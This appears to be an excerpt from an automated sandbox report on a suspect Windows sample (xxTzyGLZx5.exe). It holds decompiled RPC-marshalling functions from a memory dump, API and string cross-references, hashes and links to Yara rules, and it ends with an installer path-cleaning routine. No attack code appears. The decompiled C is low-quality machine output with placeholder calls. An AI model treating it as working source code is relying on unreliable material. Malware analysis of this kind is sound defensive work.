                                                                                                0x6edadc1d
                                                                                                0x6edadc23
                                                                                                0x6edadc27
                                                                                                0x6edadc30
                                                                                                0x6edadc30
                                                                                                0x6edadc0a
                                                                                                0x6edadc13
                                                                                                0x6edadc13
                                                                                                0x6edadbcc
                                                                                                0x6edadbcc
                                                                                                0x6edadbd4
                                                                                                0x6edadbdd
                                                                                                0x6edadbdd
                                                                                                0x6edadc3d
                                                                                                0x6edadc5f
                                                                                                0x6edadc3f
                                                                                                0x6edadc47
                                                                                                0x6edadc4c
                                                                                                0x6edadc6a
                                                                                                0x6edadc70
                                                                                                0x6edadc90
                                                                                                0x6edadc96
                                                                                                0x6edadca4
                                                                                                0x6edadc72
                                                                                                0x6edadc78
                                                                                                0x6edadc86
                                                                                                0x6edadc8b
                                                                                                0x6edadc70
                                                                                                0x6edadcac
                                                                                                0x6edade07

                                                                                                APIs
                                                                                                • RpcRaiseException.RPCRT4(000006C6), ref: 6EDADB47
                                                                                                • RpcRaiseException.RPCRT4(000006C6), ref: 6EDADB6F
                                                                                                • NdrAllocate.RPCRT4(?,?), ref: 6EDADBD4
                                                                                                • NdrAllocate.RPCRT4(?,?), ref: 6EDADC27
                                                                                                Strings
                                                                                                • string=%s, xrefs: 6EDADC81
                                                                                                • buffer size %d must equal memory size %ld for non-sized conformant strings, xrefs: 6EDADB35
                                                                                                • conformant strings can't have Offset (%d), xrefs: 6EDADB5D
                                                                                                • string=%s, xrefs: 6EDADC9F
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: AllocateExceptionRaise
                                                                                                • String ID: buffer size %d must equal memory size %ld for non-sized conformant strings$conformant strings can't have Offset (%d)$string=%s$string=%s
                                                                                                • API String ID: 1227477006-815763081
                                                                                                • Opcode ID: 4ffbe9906987fbec421162cc015659ffa4862a1b22de8259e3242eae7c7c9c8d
                                                                                                • Instruction ID: 18993c18bd17548e071d78ab53569980be1b478b3b16cac010148407fb7387d1
                                                                                                • Opcode Fuzzy Hash: 4ffbe9906987fbec421162cc015659ffa4862a1b22de8259e3242eae7c7c9c8d
                                                                                                • Instruction Fuzzy Hash: D5512BB5A00109EFCB44DF98C890EAAB776AF89318F10C558FE558B385E735EA41CF61
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 6EDA1160, Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 143COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 19%
                                                                                                			E6EDA1160(intOrPtr _a4, intOrPtr _a8, signed char* _a12) {
				signed char* _v8;
				signed char* _v12;
				intOrPtr _v16;
				signed int _v20;
				intOrPtr _t72;
				signed char* _t73;
				signed char* _t98;
				void* _t126;
				void* _t127;
				void* _t132;

				_v8 = _a12;
				0x6eda0000("(%p, %p, %p)\n", _a4, _a8, _a12);
				_t127 = _t126 + 0x10;
				_a12 = _a12 + 6;
				if(( *_v8 & 0x000000ff) == 0x18 || ( *_v8 & 0x000000ff) == 0x17) {
					_v12 =  &(_v8[_v8[4] + 4]);
					__eflags = ( *_v12 & 0x000000ff) - 0x1b;
					if(__eflags == 0) {
						_v20 = _v12[2] & 0x0000ffff;
						0x6eda0000(_a4, (_v8[2] & 0x0000ffff) + _a8,  &(_v12[4]), 0);
						E6EDAA730(_a4, __eflags, _a4);
						E6EDA7400(_a4 + 4, _a4 + 4, (_v8[1] & 0x000000ff) + 1);
						0x6eda0000("memory_size = %d\n", _v8[2] & 0x0000ffff);
						_t72 = E6EDAAEC0(_v20,  *((intOrPtr*)(_a4 + 0x3c)));
						_t132 = _t127 + 0x2c;
						_v16 = _t72;
						_t98 = _v8;
						_t73 = _v8;
						__eflags = ( *(_t98 + 2) & 0x0000ffff) + _v16 - ( *(_t73 + 2) & 0x0000ffff);
						if(( *(_t98 + 2) & 0x0000ffff) + _v16 < ( *(_t73 + 2) & 0x0000ffff)) {
							0x6eda0000("integer overflow of memory_size %u with bufsize %u\n", _v8[2] & 0x0000ffff, _v16);
							_t132 = _t132 + 0xc;
							__imp__RpcRaiseException(0x6f7);
						}
						 *((intOrPtr*)(_a4 + 0x10)) =  *((intOrPtr*)(_a4 + 4));
						E6EDAB030(_a4, _a8, (_v8[2] & 0x0000ffff) + _v16);
						__eflags = ( *_v8 & 0x000000ff) - 0x18;
						if(( *_v8 & 0x000000ff) == 0x18) {
							E6EDABFC0(_a4, _a8, _a12);
						}
						__eflags = 0;
						return 0;
					}
					0x6eda0000("invalid array format type %x\n",  *_v8 & 0x000000ff);
					__imp__RpcRaiseException(0x6e6);
					return 0;
				} else {
					0x6eda0000("invalid format type %x\n",  *_v8 & 0x000000ff);
					__imp__RpcRaiseException(0x6e6);
					return 0;
				}
			}













                                                                                                0x6eda1169
                                                                                                0x6eda117d
                                                                                                0x6eda1182
                                                                                                0x6eda118b
                                                                                                0x6eda1197
                                                                                                0x6eda11d8
                                                                                                0x6eda11e1
                                                                                                0x6eda11e4
                                                                                                0x6eda1213
                                                                                                0x6eda122e
                                                                                                0x6eda123a
                                                                                                0x6eda1254
                                                                                                0x6eda1269
                                                                                                0x6eda127c
                                                                                                0x6eda1281
                                                                                                0x6eda1284
                                                                                                0x6eda1287
                                                                                                0x6eda1291
                                                                                                0x6eda1298
                                                                                                0x6eda129a
                                                                                                0x6eda12ad
                                                                                                0x6eda12b2
                                                                                                0x6eda12ba
                                                                                                0x6eda12ba
                                                                                                0x6eda12c9
                                                                                                0x6eda12df
                                                                                                0x6eda12ed
                                                                                                0x6eda12f0
                                                                                                0x6eda12fe
                                                                                                0x6eda1303
                                                                                                0x6eda1306
                                                                                                0x00000000
                                                                                                0x6eda1306
                                                                                                0x6eda11f2
                                                                                                0x6eda11ff
                                                                                                0x00000000
                                                                                                0x6eda11a4
                                                                                                0x6eda11b0
                                                                                                0x6eda11bd
                                                                                                0x00000000
                                                                                                0x6eda11c3

                                                                                                APIs
                                                                                                • RpcRaiseException.RPCRT4(000006E6), ref: 6EDA11BD
                                                                                                • RpcRaiseException.RPCRT4(000006E6), ref: 6EDA11FF
                                                                                                • RpcRaiseException.RPCRT4(000006F7), ref: 6EDA12BA
                                                                                                Strings
                                                                                                • invalid array format type %x, xrefs: 6EDA11ED
                                                                                                • invalid format type %x, xrefs: 6EDA11AB
                                                                                                • (%p, %p, %p), xrefs: 6EDA1178
                                                                                                • memory_size = %d, xrefs: 6EDA1264
                                                                                                • integer overflow of memory_size %u with bufsize %u, xrefs: 6EDA12A8
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise
                                                                                                • String ID: (%p, %p, %p)$integer overflow of memory_size %u with bufsize %u$invalid array format type %x$invalid format type %x$memory_size = %d
                                                                                                • API String ID: 3997070919-1411272697
                                                                                                • Opcode ID: 0e401a1702892e43752af72516a1aef7b2b0fe89c3c34720432832682deb36cb
                                                                                                • Instruction ID: 4261c264eb63bc5963f8fe56a43a86e2c675ed5400996bde466ef5ac2a0b5c9d
                                                                                                • Opcode Fuzzy Hash: 0e401a1702892e43752af72516a1aef7b2b0fe89c3c34720432832682deb36cb
                                                                                                • Instruction Fuzzy Hash: 79515FB5A00108EBCB44CFD8D8919BEB7F6AF89249F148588F9499B345E731DF51CBA0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 6EDA42F0, Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 140memoryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • RpcRaiseException.RPCRT4(000006C6), ref: 6EDA435B
                                                                                                • RpcRaiseException.RPCRT4(000006F7), ref: 6EDA43A2
                                                                                                • NdrAllocate.RPCRT4(?,?), ref: 6EDA4400
                                                                                                Strings
                                                                                                • (pStubMsg == ^%p, *pMemory == ^%p, pFormat == ^%p, fMustAlloc == %u), xrefs: 6EDA4309
                                                                                                • Unhandled string type: %#x, xrefs: 6EDA4390
                                                                                                • string=%s, xrefs: 6EDA4442
                                                                                                • non-conformant strings can't have Offset (%d), xrefs: 6EDA4349
                                                                                                • string=%s, xrefs: 6EDA4472
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise$Allocate
                                                                                                • String ID: (pStubMsg == ^%p, *pMemory == ^%p, pFormat == ^%p, fMustAlloc == %u)$Unhandled string type: %#x$non-conformant strings can't have Offset (%d)$string=%s$string=%s
                                                                                                • API String ID: 3870461605-2310601589
                                                                                                • Opcode ID: ea3a63433583cc231137013f4af7b4b76325aede29c48862343a419cc2fc7f59
                                                                                                • Instruction ID: f5a6b3f7696ce4a16c4be2bbac898541068d517fc49ddaf7e29cbe3435b423fa
                                                                                                • Opcode Fuzzy Hash: ea3a63433583cc231137013f4af7b4b76325aede29c48862343a419cc2fc7f59
                                                                                                • Instruction Fuzzy Hash: C1518FB5A00104EFCB04CFD8D890AAE77BAAF89305F108558FE558B345E731EA51CBA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 6EDAB9F0, Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 129COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • RpcRaiseException.RPCRT4(000006F4,?,?,?,?,?,?,?,?,?,?,?,?,6EDA8C95), ref: 6EDABAAD
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise
                                                                                                • String ID: (%p,%p,%p)$NULL ref pointer is not allowed$deref => %p$no buffersizer for data type=%02x$type=0x%x, attr=$unhandled ptr type=%02x
                                                                                                • API String ID: 3997070919-3973141097
                                                                                                • Opcode ID: 22076b8f2c9d1c0e61d7c02d782b92b07d0f4c36032e20ee92df49fa2f5df7d2
                                                                                                • Instruction ID: 94d65ee2384f4c30603fc03728b6ec8afbdb126d36c6bd1edf60be4fb322a511
                                                                                                • Opcode Fuzzy Hash: 22076b8f2c9d1c0e61d7c02d782b92b07d0f4c36032e20ee92df49fa2f5df7d2
                                                                                                • Instruction Fuzzy Hash: 305157B490420DEFDB04CFD8C894AAEBBB5FB49345F008459EA155B388E7709B51CBA2
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 6EDA8850, Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 100COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 16%
                                                                                                			E6EDA8850(intOrPtr* _a4, intOrPtr* _a8, signed char* _a12, signed char _a16) {
				intOrPtr* _v8;
				char* _v12;
				intOrPtr _v16;
				signed char* _t49;
				signed char* _t75;
				void* _t86;
				void* _t87;

				if((_a16 & 0x000000ff) == 0) {
					_v12 = "FALSE";
				} else {
					_v12 = "TRUE";
				}
				0x6eda0000("pStubMsg %p, ppMemory %p, pFormat %p, fMustAlloc %s\n", _a4, _a8, _a12, _v12);
				_t87 = _t86 + 0x14;
				if(( *_a12 & 0x000000ff) != 0x30) {
					0x6eda0000("invalid format type %x\n",  *_a12 & 0x000000ff);
					_t87 = _t87 + 8;
					__imp__RpcRaiseException(0x6e6);
				}
				0x6eda0000("flags: 0x%02x\n", _a12[1] & 0x000000ff);
				if(( *(_a4 + 0x20) & 0x000000ff) == 0) {
					_v16 = E6EDA4BC0(__eflags, _a4, _a12);
					_t75 = _a12;
					__eflags =  *(_t75 + (1 << 0)) & 0x80;
					if(( *(_t75 + (1 << 0)) & 0x80) == 0) {
						 *_a8 =  *((intOrPtr*)(_v16 + 8));
					} else {
						 *_a8 = _v16 + 8;
					}
				} else {
					if((_a12[1] & 0x80) == 0) {
						_v8 = _a8;
					} else {
						_v8 =  *_a8;
					}
					_t49 = _a12;
					_t93 = (_t49[1] & 0x60) - 0x20;
					if((_t49[1] & 0x60) == 0x20) {
						 *_v8 = 0;
					}
					E6EDA49D0(_t93, _a4, _v8,  *((intOrPtr*)( *_a4)));
				}
				return 0;
			}










                                                                                                0x6eda885c
                                                                                                0x6eda8867
                                                                                                0x6eda885e
                                                                                                0x6eda885e
                                                                                                0x6eda885e
                                                                                                0x6eda8883
                                                                                                0x6eda8888
                                                                                                0x6eda8894
                                                                                                0x6eda88a2
                                                                                                0x6eda88a7
                                                                                                0x6eda88af
                                                                                                0x6eda88af
                                                                                                0x6eda88ca
                                                                                                0x6eda88db
                                                                                                0x6eda8948
                                                                                                0x6eda8953
                                                                                                0x6eda895a
                                                                                                0x6eda895f
                                                                                                0x6eda8977
                                                                                                0x6eda8961
                                                                                                0x6eda896a
                                                                                                0x6eda896a
                                                                                                0x6eda88dd
                                                                                                0x6eda88f2
                                                                                                0x6eda8901
                                                                                                0x6eda88f4
                                                                                                0x6eda88f9
                                                                                                0x6eda88f9
                                                                                                0x6eda890c
                                                                                                0x6eda8916
                                                                                                0x6eda8919
                                                                                                0x6eda891e
                                                                                                0x6eda891e
                                                                                                0x6eda8934
                                                                                                0x6eda8934
                                                                                                0x6eda897e

                                                                                                APIs
                                                                                                • RpcRaiseException.RPCRT4(000006E6), ref: 6EDA88AF
                                                                                                • _NdrClientContextUnmarshall@12.SOZZ(?,?,00000001), ref: 6EDA8934
                                                                                                • _NdrServerContextNewUnmarshall@8.SOZZ(?,?), ref: 6EDA8943
                                                                                                  • Part of subcall function 6EDA4BC0: RpcRaiseException.RPCRT4(000006F7), ref: 6EDA4C3D
                                                                                                  • Part of subcall function 6EDA4BC0: NDRSContextUnmarshall2.RPCRT4(00000000,00000000,?,?,00000000), ref: 6EDA4CCB
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Context$ExceptionRaise$ClientServerUnmarshall2Unmarshall@12Unmarshall@8
                                                                                                • String ID: FALSE$TRUE$flags: 0x%02x$invalid format type %x$pStubMsg %p, ppMemory %p, pFormat %p, fMustAlloc %s
                                                                                                • API String ID: 1280706169-3585304320
                                                                                                • Opcode ID: 513ac7c815d6957191f48849e557111c755e800d1b6b87529b7083037f0ef6ff
                                                                                                • Instruction ID: fb3e725e6dc90c7289dcbfb80729a61aa94eacf0a4f7a23c18f3b9a15010753a
                                                                                                • Opcode Fuzzy Hash: 513ac7c815d6957191f48849e557111c755e800d1b6b87529b7083037f0ef6ff
                                                                                                • Instruction Fuzzy Hash: 834182B5A002859FDB54CF99C8A0BAE7BB5FF89340F108059FD558F380C634DA11CB61
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 6EDA1AD0, Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 162COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • RpcRaiseException.RPCRT4(000006E6), ref: 6EDA1B2C
                                                                                                • _NdrComplexArrayBufferSize@12.SOZZ(?,?,?), ref: 6EDA1B9D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: ArrayBufferComplexExceptionRaiseSize@12
                                                                                                • String ID: (%p,%p,%p)$buffer overflow %d bytes$buffer=%d/%d$difference = 0x%x$invalid format type %x
                                                                                                • API String ID: 1767167962-3633984987
                                                                                                • Opcode ID: d85c9e1976170a2013127544c6ab2df09ff0a2fd7646de493ce39c9443eaf547
                                                                                                • Instruction ID: 934032a19e2b75e5dca8cac1b1a98b303fcd3cfb10ad86e234c903c508ec249e
                                                                                                • Opcode Fuzzy Hash: d85c9e1976170a2013127544c6ab2df09ff0a2fd7646de493ce39c9443eaf547
                                                                                                • Instruction Fuzzy Hash: 6971B9B8A00209EFCB04CF98C594EAABBB5FF88354F15C158ED498B355D731EA81CB91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 6EDA2F65, Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 102memoryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • NdrAllocate.RPCRT4(?,00000004), ref: 6EDA2F98
                                                                                                • RpcRaiseException.RPCRT4(000006F7), ref: 6EDA2FDC
                                                                                                • RpcRaiseException.RPCRT4(000006C6), ref: 6EDA302B
                                                                                                Strings
                                                                                                • *ppMemory: %p, xrefs: 6EDA303E
                                                                                                • buffer overflow - Buffer = %p, BufferEnd = %p, xrefs: 6EDA2FCA
                                                                                                • value exceeded bounds: %d, low: %d, high: %d, xrefs: 6EDA3019
                                                                                                • value: 0x%08x, xrefs: 6EDA3079
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise$Allocate
                                                                                                • String ID: *ppMemory: %p$buffer overflow - Buffer = %p, BufferEnd = %p$value exceeded bounds: %d, low: %d, high: %d$value: 0x%08x
                                                                                                • API String ID: 3870461605-453365574
                                                                                                • Opcode ID: e94560bb54eba049db4b24aa62ab58fe9e07393ffc42893acd994353a5f618cf
                                                                                                • Instruction ID: d05b07a60a0ccfd0b413dd9b569dccb26b7dcf7b12e43fd058628e364e9596ba
                                                                                                • Opcode Fuzzy Hash: e94560bb54eba049db4b24aa62ab58fe9e07393ffc42893acd994353a5f618cf
                                                                                                • Instruction Fuzzy Hash: 5841F8B8600105EFDB04CF99C495E9ABBB6EF8A358F14C188ED498F345D731EA51CBA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 6EDA308B, Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 102memoryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • NdrAllocate.RPCRT4(?,00000004), ref: 6EDA30BE
                                                                                                • RpcRaiseException.RPCRT4(000006F7), ref: 6EDA3102
                                                                                                • RpcRaiseException.RPCRT4(000006C6), ref: 6EDA3151
                                                                                                Strings
                                                                                                • buffer overflow - Buffer = %p, BufferEnd = %p, xrefs: 6EDA30F0
                                                                                                • value: 0x%08x, xrefs: 6EDA319F
                                                                                                • value exceeded bounds: %u, low: %u, high: %u, xrefs: 6EDA313F
                                                                                                • *ppMemory: %p, xrefs: 6EDA3164
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise$Allocate
                                                                                                • String ID: *ppMemory: %p$buffer overflow - Buffer = %p, BufferEnd = %p$value exceeded bounds: %u, low: %u, high: %u$value: 0x%08x
                                                                                                • API String ID: 3870461605-3476790181
                                                                                                • Opcode ID: f5a26acbb3b2881b506125a34ad4de88cc7a88c57d9a5df3b941b68c06d26f25
                                                                                                • Instruction ID: e923f47aeea0ca164f4db6df82fc2d1bd0771d33475f03a2390ca94fea5ca08b
                                                                                                • Opcode Fuzzy Hash: f5a26acbb3b2881b506125a34ad4de88cc7a88c57d9a5df3b941b68c06d26f25
                                                                                                • Instruction Fuzzy Hash: 0E4109B8600105EFD704CF98C894E5ABBA6EF89354F14C188EA498F385D731EA81CBA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 6EDA31B1, Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 102memoryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • NdrAllocate.RPCRT4(?,00000004), ref: 6EDA31E4
                                                                                                • RpcRaiseException.RPCRT4(000006F7), ref: 6EDA3228
                                                                                                • RpcRaiseException.RPCRT4(000006C6), ref: 6EDA327A
                                                                                                Strings
                                                                                                • value exceeded bounds: %u, low: %u, high: %u, xrefs: 6EDA3268
                                                                                                • *ppMemory: %p, xrefs: 6EDA328A
                                                                                                • value: 0x%08x, xrefs: 6EDA32C6
                                                                                                • buffer overflow - Buffer = %p, BufferEnd = %p, xrefs: 6EDA3216
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise$Allocate
                                                                                                • String ID: *ppMemory: %p$buffer overflow - Buffer = %p, BufferEnd = %p$value exceeded bounds: %u, low: %u, high: %u$value: 0x%08x
                                                                                                • API String ID: 3870461605-3476790181
                                                                                                • Opcode ID: 2e0555c7184e9dd28b003d2a778352b396cad46f388f873bbb442856692e6845
                                                                                                • Instruction ID: b050c8c134f06b090baa625cbe31acd8a454ec7db6c5c869c630b029c6956966
                                                                                                • Opcode Fuzzy Hash: 2e0555c7184e9dd28b003d2a778352b396cad46f388f873bbb442856692e6845
                                                                                                • Instruction Fuzzy Hash: E64118B8600104EFD704CF98C895E6ABBA6FF89354F14C188ED498F395D331EA91CBA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00405B89, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E00405B89(CHAR* _a4) {
				char _t5;
				char _t7;
				char* _t15;
				char* _t16;
				CHAR* _t17;

				_t17 = _a4;
				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
					_t17 =  &(_t17[4]);
				}
				if( *_t17 != 0 && E0040548B(_t17) != 0) {
					_t17 =  &(_t17[2]);
				}
				_t5 =  *_t17;
				_t15 = _t17;
				_t16 = _t17;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((char*)(E00405449("*?|<>/\":", _t5))) == 0) {
							E004055C3(_t16, _t17, CharNextA(_t17) - _t17);
							_t16 = CharNextA(_t16);
						}
						_t17 = CharNextA(_t17);
						_t5 =  *_t17;
					} while (_t5 != 0);
				}
				 *_t16 =  *_t16 & 0x00000000;
				while(1) {
					_t16 = CharPrevA(_t15, _t16);
					_t7 =  *_t16;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t16 =  *_t16 & 0x00000000;
					if(_t15 < _t16) {
						continue;
					}
					break;
				}
				return _t7;
			}








                                                                                                0x00405b8b
                                                                                                0x00405b93
                                                                                                0x00405ba7
                                                                                                0x00405ba7
                                                                                                0x00405bad
                                                                                                0x00405bba
                                                                                                0x00405bba
                                                                                                0x00405bbb
                                                                                                0x00405bbd
                                                                                                0x00405bc1
                                                                                                0x00405bc3
                                                                                                0x00405bcc
                                                                                                0x00405bce
                                                                                                0x00405be8
                                                                                                0x00405bf0
                                                                                                0x00405bf0
                                                                                                0x00405bf5
                                                                                                0x00405bf7
                                                                                                0x00405bf9
                                                                                                0x00405bfd
                                                                                                0x00405bfe
                                                                                                0x00405c01
                                                                                                0x00405c09
                                                                                                0x00405c0b
                                                                                                0x00405c0f
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00405c15
                                                                                                0x00405c1a
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00405c1a
                                                                                                0x00405c1f

                                                                                                APIs
                                                                                                • CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\xxTzyGLZx5.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004030BB,C:\Users\user\AppData\Local\Temp\,00000000,0040322D), ref: 00405BE1
                                                                                                • CharNextA.USER32(?,?,?,00000000), ref: 00405BEE
                                                                                                • CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\xxTzyGLZx5.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004030BB,C:\Users\user\AppData\Local\Temp\,00000000,0040322D), ref: 00405BF3
                                                                                                • CharPrevA.USER32(?,?,"C:\Users\user\Desktop\xxTzyGLZx5.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004030BB,C:\Users\user\AppData\Local\Temp\,00000000,0040322D), ref: 00405C03
                                                                                                Strings
                                                                                                Memory Dump Source
